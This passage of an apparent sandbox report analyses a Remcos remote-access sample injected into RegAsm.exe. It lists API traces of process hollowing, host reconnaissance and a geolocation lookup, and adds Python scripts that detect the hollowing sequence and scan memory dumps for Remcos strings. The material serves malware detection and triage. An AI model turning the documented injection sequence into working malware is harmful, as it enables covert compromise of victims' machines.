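SECTION_ALL_ACCESS = 0x000F001F     # NtCreateSection DesiredAccess
SEC_COMMIT = 0x08000000             # NtCreateSection AllocationAttributes

# "• Api.MODULE(arg,...), ref: 0041XXXX" and the paren-less "• GetLastError.KERNEL32 ref: ..."
LINE_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

@dataclass
class Call:
    api: str
    module: str
    args: list   # int for a hex value, None for '?', str for a string argument
    ref: int     # call-site address

def parse_trace(text):
    """Turn report API lines into Call objects; other lines are ignored."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = []
        for a in (m.group("args") or "").split(","):
            a = a.strip()
            if not a:
                continue
            if a == "?":
                args.append(None)                 # value the sandbox could not resolve
            elif re.fullmatch(r"[0-9A-Fa-f]{8}", a):
                args.append(int(a, 16))
            else:
                args.append(a)                    # e.g. "ntdll", "ZwCreateSection"
        calls.append(Call(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls

def arg(call, i):
    return call.args[i] if i < len(call.args) else None

def flag_set(value, flag):
    return isinstance(value, int) and (value & flag) != 0

def resolved_imports(calls):
    """Pair LoadLibraryA/GetModuleHandleA with the GetProcAddress right after it.
    The sandbox prints the looked-up name as GetModuleHandleA's second 'argument';
    LoadLibraryA lines carry only the module, so the name is None there."""
    out = []
    for prev, cur in zip(calls, calls[1:]):
        if cur.api == "GetProcAddress" and prev.api in ("LoadLibraryA", "GetModuleHandleA"):
            second = arg(prev, 1)
            name = second if prev.api == "GetModuleHandleA" and isinstance(second, str) else None
            out.append((arg(prev, 0), name))
    return out

# Ordered stages of section-mapping hollowing (assumed stage list); predicates check
# the argument that makes the call suspicious, not just the API name.
HOLLOW_STAGES = [
    ("CreateProcessW",     lambda c: flag_set(arg(c, 5), CREATE_SUSPENDED)),
    ("GetThreadContext",   lambda c: True),
    ("NtCreateSection",    lambda c: arg(c, 4) == PAGE_EXECUTE_READWRITE),
    ("NtMapViewOfSection", lambda c: arg(c, 9) == PAGE_EXECUTE_READWRITE),
    ("WriteProcessMemory", lambda c: True),
    ("SetThreadContext",   lambda c: True),
    ("ResumeThread",       lambda c: True),
]

def detect_hollowing(calls):
    """Return {api: call-site address} when every stage occurs in order, else None."""
    found, pos = {}, 0
    for api, suspicious in HOLLOW_STAGES:
        for i in range(pos, len(calls)):
            if calls[i].api == api and suspicious(calls[i]):
                found[api], pos = calls[i].ref, i + 1
                break
        else:
            return None
    return found

def describe_section(call):
    """Decode the NtCreateSection arguments that matter for this technique."""
    return {
        "all_access": arg(call, 1) == SECTION_ALL_ACCESS,
        "rwx": arg(call, 4) == PAGE_EXECUTE_READWRITE,
        "sec_commit": flag_set(arg(call, 5), SEC_COMMIT),
        "pagefile_backed": arg(call, 6) == 0,      # no FileHandle: anonymous section
    }

# Subset of the API list for the function at 0041812a, copied from this report.
SAMPLE = """
• GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
• GetProcAddress.KERNEL32(00000000), ref: 00418174
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
• GetThreadContext.KERNEL32(?,00000000), ref: 00418280
• ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004182A6
• NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 004182CE
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 00418316
• NtMapViewOfSection.NTDLL(?,00000000), ref: 00418387
• WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00418446
• SetThreadContext.KERNEL32(?,00000000), ref: 00418463
• ResumeThread.KERNEL32(?), ref: 00418470
• GetLastError.KERNEL32 ref: 004184B5
"""

if __name__ == "__main__":
    calls = parse_trace(SAMPLE)
    print(resolved_imports(calls))
    print(detect_hollowing(calls))
```

                                                                                 Feeding the whole API list of a report into parse_trace works the same way; the second NtMapViewOfSection line, which the sandbox printed with only two arguments, shows why the argument accessor tolerates short argument lists instead of indexing blindly.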
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Process$Section$AddressHandleModuleProcView$ThreadVirtual$CloseContextCreateCurrentFreeMemoryTerminateUnmap$AllocErrorLastReadResumeWrite
                                                                                • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$ntdll
                                                                                • API String ID: 316982871-3035715614
                                                                                • Opcode ID: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                • Instruction ID: d7ba82c79e3f17b97bd8f2c1aaed993f07984c16d96ff77cb9dc1491e823fc6f
                                                                                • Opcode Fuzzy Hash: c823a5a523639eb235f5adfe7c5fce7303d6972b4bd708db87ed0c766a231877
                                                                                • Instruction Fuzzy Hash: 69A15FB0604305AFDB209F64DD85B6B7BE8FF48705F00482EF685D6291EB78D844CB59

                                                                                 Control-flow Graph (basic blocks of the function at 100010f1: block id, address range, calls in the block, successor blocks)
                                                                                 • 1580  100010f1-10001166  call 10002c40 * 2 lstrlenW call 10002c40 lstrcatW lstrlenW -> 1587, 1588
                                                                                 • 1587  10001177-1000119e  lstrlenW FindFirstFileW -> 1589, 1590
                                                                                 • 1588  10001168-10001172  lstrlenW -> 1587
                                                                                 • 1589  100011a0-100011a8 -> 1591, 1592
                                                                                 • 1590  100011e1-100011e9 (no successors)
                                                                                 • 1591  100011c7-100011d8  FindNextFileW -> 1589, 1594
                                                                                 • 1592  100011aa-100011c4  call 10001000 -> 1591
                                                                                 • 1594  100011da-100011db  FindClose -> 1590
                                                                                APIs
                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 10001137
                                                                                • lstrcatW.KERNEL32(?,?), ref: 10001151
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000115C
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000116D
                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1000117C
                                                                                • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 10001193
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 100011D0
                                                                                • FindClose.KERNEL32(00000000), ref: 100011DB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1042274200.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1042264096.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1042274200.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_10000000_RegAsm.jbxd
                                                                                Similarity
                                                                                • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                • String ID:
                                                                                • API String ID: 1083526818-0
                                                                                • Opcode ID: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                • Instruction ID: 89aa6ca17049c9a574106098fd68ded4b08ae6dd255c3979a52dcbc6bb9ed716
                                                                                • Opcode Fuzzy Hash: 27fd7685666e3c989c46effb07117df397b19369cc2c037b590c32d569d2463a
                                                                                • Instruction Fuzzy Hash: D22193715043586BE714EB649C49FDF7BDCEF84394F00092AFA58D3190E770D64487A6

                                                                                Control-flow Graph

                                                                                APIs
                                                                                  • Part of subcall function 00413584: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004135A4
                                                                                  • Part of subcall function 00413584: RegQueryValueExA.KERNEL32 ref: 004135C2
                                                                                  • Part of subcall function 00413584: RegCloseKey.KERNEL32(?), ref: 004135CD
                                                                                • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                                                                • ExitProcess.KERNEL32 ref: 0040F905
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseExitOpenProcessQuerySleepValue
                                                                                • String ID: 5.1.1 Pro$override$pth_unenc$34
                                                                                • API String ID: 2281282204-382138516
                                                                                • Opcode ID: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                                                                • Opcode Fuzzy Hash: 12348d3a2fbe885265e601d0d8f624f68943fb23a48e4508fc59bb7df0f8f03e
                                                                                • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF

                                                                                 Control-flow Graph (basic blocks of the function at 41b411: block id, address range, calls in the block, successor blocks)
                                                                                 • 1643  41b411-41b454  call 4020df call 43bda0 InternetOpenW InternetOpenUrlW -> 1648
                                                                                 • 1648  41b456-41b477  InternetReadFile -> 1649, 1650
                                                                                 • 1649  41b479-41b499  call 4020b7 call 403376 call 401fd8 -> 1650
                                                                                 • 1650  41b49d-41b4a0 -> 1652, 1653
                                                                                 • 1652  41b4a2-41b4a4 -> 1648, 1653
                                                                                 • 1653  41b4a6-41b4b3  InternetCloseHandle * 2 call 43bd9b -> 1657
                                                                                 • 1657  41b4b8-41b4c2 (no successors)
                                                                                APIs
                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                                                                Strings
                                                                                • http://geoplugin.net/json.gp, xrefs: 0041B448
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                • API String ID: 3121278467-91888290
                                                                                • Opcode ID: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                • Instruction ID: e320c318363c88f1c040182635621d8729538b68a2f0080144892bf513bd3cc2
                                                                                • Opcode Fuzzy Hash: 70a4068dcfb2335a76a71926155551062e92c520b8980e27f9727ee13041a59e
                                                                                • Instruction Fuzzy Hash: 011198311053126BD224AB269C49EBF7F9CEF86765F10043EF945A2282DB689C44C6FA
                                                                                APIs
                                                                                  • Part of subcall function 004117D7: SetLastError.KERNEL32(0000000D,00411D57,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 004117DD
                                                                                • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411D35), ref: 00411D72
                                                                                • GetNativeSystemInfo.KERNEL32(?), ref: 00411DE0
                                                                                • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411E04
                                                                                  • Part of subcall function 00411CDE: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411E4B
                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411E52
                                                                                • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411F65
                                                                                  • Part of subcall function 004120B2: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                                                                  • Part of subcall function 004120B2: HeapFree.KERNEL32(00000000), ref: 00412129
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                 • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                                                                • String ID:
                                                                                • API String ID: 3950776272-0
                                                                                • Opcode ID: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                • Instruction ID: da58ab861bd0a84ec3871346ef31e8b8814b9d9500880b3a3e1890ad13292c25
                                                                                • Opcode Fuzzy Hash: 718d42136e622159178195cb0efe2cc12f9c08079781f225a480952b3bcd75f7
                                                                                • Instruction Fuzzy Hash: F761A270700611ABCB209F66C981BAA7BA5AF44704F14411AFF05877A2D77CE8C2CBD9
                                                                                APIs
                                                                                • GetComputerNameExW.KERNEL32(00000001,?,0000002B,p54), ref: 0041B6BB
                                                                                • GetUserNameW.ADVAPI32(?,0040F25E), ref: 0041B6D3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Name$ComputerUser
                                                                                • String ID: p54
                                                                                • API String ID: 4229901323-674596673
                                                                                • Opcode ID: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                • Instruction ID: 8360233331794fbd8bccde093e114755ab2a7c2896376219b9d5f45c8fb32f7b
                                                                                • Opcode Fuzzy Hash: 2a75debd1ac83804218ef8ff91a3dd31c7e5d47f43b5da7d436b4f8c80832694
                                                                                • Instruction Fuzzy Hash: 90014F7190011CABCB01EBD1DC45EEDB7BCAF44309F10016AB505B21A1EFB46E88CBA8
                                                                                APIs
                                                                                • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00433550,00000034,?,?,00349B10), ref: 004338DA
                                                                                • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000), ref: 004338F0
                                                                                • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,004335E3,00000000,?,00000000,0041E2E2), ref: 00433902
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Crypt$Context$AcquireRandomRelease
                                                                                • String ID:
                                                                                • API String ID: 1815803762-0
                                                                                • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                • Instruction ID: d68cd6f5f98cbfa2ab0450769c499d20ea76a36e668e3df749659bd42d9a4b78
                                                                                • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                                                • Instruction Fuzzy Hash: 40E09A31208310FBEB301F21AC08F573AA5EF89B66F200A3AF256E40E4D6A68801965C
                                                                                APIs
                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000,0043AB37), ref: 00448A16
                                                                                Strings
                                                                                • GetSystemTimePreciseAsFileTime, xrefs: 004489F2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$FileSystem
                                                                                • String ID: GetSystemTimePreciseAsFileTime
                                                                                • API String ID: 2086374402-595813830
                                                                                • Opcode ID: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                • Instruction ID: bacba389ed7ed90706db716b221aab5ed2509560655679cc0f09f15d90276a03
                                                                                • Opcode Fuzzy Hash: c8476c07d91a2673d79eb1bf06ec4ca2dbc9f8e1099c36818990a3b57f66e430
                                                                                • Instruction Fuzzy Hash: 79E0E531A81618FBD7116B25EC02E7EBB50DB08B02B10027FFC05A7292EE754D14D6DE
                                                                                APIs
                                                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 00434BDD
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExceptionFilterUnhandled
                                                                                • String ID:
                                                                                • API String ID: 3192549508-0
                                                                                • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                                                                • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                                                                • Instruction Fuzzy Hash:

                                                                                Control-flow Graph
                                                                                (rendered graph omitted; the Executed / Not Executed colouring is not recoverable from text)
                                                                                • Function 0040EA00: basic blocks span 40ea00-40f3ea
                                                                                • API call sites on the graph: GetModuleFileNameW (40ea00), CreateThread (7 sites, 40effe-40f2b2), StrToIntA (40f025), SetProcessDEPPolicy (40f27b), DeleteFileW (40f381), Sleep (40f36f)
                                                                                APIs
                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Psapi), ref: 0041CBF6
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CBFF
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040EA1C), ref: 0041CC16
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC19
                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(shcore), ref: 0041CC2B
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC2E
                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(user32), ref: 0041CC3F
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC42
                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(ntdll), ref: 0041CC54
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC57
                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(kernel32), ref: 0041CC63
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC66
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040EA1C), ref: 0041CC77
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC7A
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040EA1C), ref: 0041CC8B
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CC8E
                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shell32), ref: 0041CC9F
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCA2
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040EA1C), ref: 0041CCB3
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCB6
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040EA1C), ref: 0041CCC7
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCCA
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040EA1C), ref: 0041CCDB
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCDE
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040EA1C), ref: 0041CCEF
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CCF2
                                                                                  • Part of subcall function 0041CBE1: GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040EA1C), ref: 0041CD03
                                                                                  • Part of subcall function 0041CBE1: GetProcAddress.KERNEL32(00000000,?,?,?,?,0040EA1C), ref: 0041CD06
                                                                                  • Part of subcall function 0041CBE1: LoadLibraryA.KERNEL32(Shlwapi), ref: 0041CD14
                                                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000104), ref: 0040EA29
                                                                                  • Part of subcall function 00410F72: __EH_prolog.LIBCMT ref: 00410F77
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                                                • Associated: 0000000E.00000002.1041828319.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_400000_RegAsm.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                                                                                • String ID: 8SG$8SG$@u4$Access Level: $Administrator$C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$Exe$Exe$Inj$Remcos Agent initialized$Rmc-4CT19T$Software\$User$dMG$del$del$exepath$licence$license_code.txt$p54$34
                                                                                • API String ID: 2830904901-1950504982
                                                                                • Opcode ID: ea8aa897b517b46e2c0f88cc73235cbabdde2d4f89d4bb93d5e68e572d9e21cb
                                                                                • Instruction ID: f870588dacc207cf398a21a9077505b2b75b96970711a81e27f166ce8512e3fa
                                                                                • Opcode Fuzzy Hash: ea8aa897b517b46e2c0f88cc73235cbabdde2d4f89d4bb93d5e68e572d9e21cb
                                                                                • Instruction Fuzzy Hash: 9B32F960B043412BDA24B7729C57B7E26994F80748F50483FB9467B2E3EEBC8D45839E
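The String IDs and the run-time-resolved API names in the 0040EA00 block above are enough to triage further dumps of this family. The Python below is an added example written for this page, not Joe Sandbox or Remcos code: it searches a memory dump for those strings (as ASCII and as UTF-16LE, since the RegAsm.exe path reported by GetModuleFileNameW is a wide string in memory) and for the API names that the 0041CBE1 routine resolves through GetModuleHandleA/GetProcAddress, then returns a verdict. The sample dump is constructed inline; the scoring thresholds are an assumption for illustration.

```python
"""Triage a process memory dump for the Remcos indicators shown in this report.

Added example for this page, not Joe Sandbox or Remcos code. Indicator strings
and API names are taken from the function blocks above; the sample dump is
constructed here and is not a real capture. Scoring thresholds are assumptions.
"""
import sys
from typing import Dict, List, Union

# String IDs from the RegAsm.exe 0x00400000 region (0040EA00 and 00414F65 blocks).
REMCOS_STRINGS: List[str] = [
    "Remcos Agent initialized",
    "Rmc-4CT19T",
    "license_code.txt",
    "Access Level: ",
    "TLS On ",
    "TLS Off",
    "Connecting | ",
    "Connected | ",
    "Connection Error: Unable to create socket",
    "exepath",
]
# Strings treated as family-specific on their own (assumption: the two most distinctive).
FAMILY_STRINGS = {"Remcos Agent initialized", "Rmc-4CT19T"}

# APIs the 0041CBE1 routine resolves at run time via GetModuleHandleA/GetProcAddress.
DYNAMIC_APIS: List[str] = [
    "GetProcessImageFileNameW",
    "IsWow64Process",
    "GetComputerNameExW",
    "SetProcessDEPPolicy",
    "EnumDisplayDevicesW",
    "EnumDisplayMonitors",
    "GetMonitorInfoW",
    "GetSystemTimes",
]

# Injection host reported by GetModuleFileNameW (stored as UTF-16LE in memory).
HOST_PATH = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"


def present(dump: bytes, text: str) -> bool:
    """True if text occurs in the dump as ASCII or as a Windows wide (UTF-16LE) string."""
    return text.encode("ascii") in dump or text.encode("utf-16-le") in dump


def scan_dump(dump: bytes) -> Dict[str, Union[List[str], bool, str]]:
    """Return the matched indicators and a verdict for one memory dump."""
    strings = [s for s in REMCOS_STRINGS if present(dump, s)]
    apis = [a for a in DYNAMIC_APIS if present(dump, a)]
    host = present(dump, HOST_PATH)
    family_hit = any(s in FAMILY_STRINGS for s in strings)
    # Assumption: a family-specific string plus one more indicator is a confident hit;
    # generic strings or the dynamic-import set alone only raise suspicion.
    if family_hit and len(strings) >= 2:
        verdict = "remcos"
    elif len(strings) >= 3 or len(apis) >= 4:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"strings": strings, "apis": apis, "host_path": host, "verdict": verdict}


def build_sample_dump() -> bytes:
    """Constructed dump: filler bytes with a few indicators, some stored as UTF-16LE."""
    filler = bytes(range(256)) * 4
    return (
        filler
        + b"Remcos Agent initialized\x00"
        + filler
        + "Rmc-4CT19T".encode("utf-16-le") + b"\x00\x00"
        + HOST_PATH.encode("utf-16-le") + b"\x00\x00"
        + b"GetComputerNameExW\x00IsWow64Process\x00SetProcessDEPPolicy\x00"
        + filler
        + b"license_code.txt\x00TLS On \x00"
    )


if __name__ == "__main__":
    # Usage: python remcos_triage.py <dump.bin>; without an argument the constructed sample is scanned.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_dump()
    for key, value in scan_dump(data).items():
        print(f"{key}: {value}")
```

Run it against the .sdmp files linked in the Memory Dump Source lines; searching both encodings matters because the module path and several configuration strings sit in memory as UTF-16LE while the agent's status strings are narrow.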

                                                                                Control-flow Graph
                                                                                (rendered graph omitted; the Executed / Not Executed colouring is not recoverable from text)
                                                                                • Function 00414F65: basic blocks span 414f65-415b20
                                                                                • API call sites on the graph: Sleep (414faf, 415af2), WSAGetLastError (4151c7), GetTickCount (4153fb), CreateThread (415aac)
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000,00000029,004752F0,p54,00000000), ref: 00414FB6
                                                                                • WSAGetLastError.WS2_32(00000000,00000001), ref: 004151C7
                                                                                • Sleep.KERNEL32(00000000,00000002), ref: 00415B12
